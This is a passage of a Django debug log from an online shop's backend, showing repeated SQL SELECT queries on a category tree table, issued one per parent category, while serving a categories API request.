(0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 12:38:51,597 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 12:38:51,604 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 12:38:51,608 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 12:38:51,613 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 12:38:51,616 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 12:38:51,620 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 12:38:51,623 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 12:38:51,626 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 12:38:51,629 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 12:38:51,631 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 12:38:51,634 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 12:38:51,637 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 12:38:51,639 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 12:38:51,644 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 12:38:51,648 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 12:38:51,652 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 12:38:51,659 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 12:38:51,663 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 12:38:51,667 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 12:38:51,671 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 12:38:51,675 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 12:38:51,679 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 12:38:51,685 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 12:38:51,690 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 12:38:51,694 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 12:38:51,698 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 12:38:51,702 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 12:38:51,708 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 12:38:51,712 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 12:38:51,716 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 12:38:51,720 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 12:38:51,724 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 12:38:51,731 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 12:38:51,735 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 12:38:51,739 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 12:38:51,743 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 12:38:51,747 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 12:38:51,751 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 12:38:51,756 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 12:38:51,760 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 12:38:51,764 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 12:38:51,769 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 12:38:51,773 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 12:38:51] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-19 12:41:54,501 utils 4252 140031721535232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 12:41:54,509 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 12:41:54,513 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 12:41:54,517 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 12:41:54,523 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 12:41:54,527 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 12:41:54,530 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 12:41:54,534 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 12:41:54,539 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 12:41:54,545 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 12:41:54,550 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 12:41:54,554 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 12:41:54,559 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 12:41:54,563 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 12:41:54,569 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 12:41:54,574 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 12:41:54,578 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 12:41:54,583 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 12:41:54,590 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 12:41:54,597 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 12:41:54,601 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 12:41:54,606 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 12:41:54,610 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 12:41:54,614 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", 